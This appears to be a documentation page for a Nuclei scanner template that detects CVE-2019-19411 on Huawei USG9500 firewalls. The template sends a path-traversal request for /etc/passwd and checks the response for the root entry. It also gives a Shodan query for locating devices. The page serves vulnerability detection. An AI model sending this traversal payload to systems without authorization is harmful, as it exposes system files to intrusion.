Huawei Firewall - Local File Inclusion
ID: CVE-2019-19411
Severity: low
Author: taielab
Tags: cve,cve2019,huawei,firewall,lfi
Description
Section titled “Description”USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished.
YAML Source
Section titled “YAML Source”id: CVE-2019-19411
info: name: Huawei Firewall - Local File Inclusion author: taielab severity: low description: | USG9500 with versions of V500R001C30SPC100, V500R001C30SPC200, V500R001C30SPC600, V500R001C60SPC500, V500R005C00SPC100, V500R005C00SPC200 have an information leakage vulnerability. Due to improper processing of the initialization vector used in a specific encryption algorithm, an attacker who gains access to this cryptographic primitive may exploit this vulnerability to cause the value of the confidentiality associated with its use to be diminished. reference: - https://www.huawei.com/en/psirt/security-advisories/huawei-sa-20200115-01-firewall-en classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 3.7 cve-id: CVE-2019-19411 cwe-id: CWE-665 epss-score: 0.00078 epss-percentile: 0.34692 cpe: cpe:2.3:h:huawei:usg9500:-:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: huawei product: usg9500 shodan-query: title:"HUAWEI" tags: cve,cve2019,huawei,firewall,lfi
http: - method: GET path: - "{{BaseURL}}/umweb/../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:[x*]:0:0:"
- type: word part: header words: - "application/octet-stream"
- type: status status: - 200# digest: 4b0a00483046022100c7fe70fba7b606a7ceca7c04356ce30b0fde474eb63d62457606da843da5503f022100bc2b6bd01266237a66f977ba3f6fe432c58a6297cfd75479fffb610df855cad7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-19411.yaml"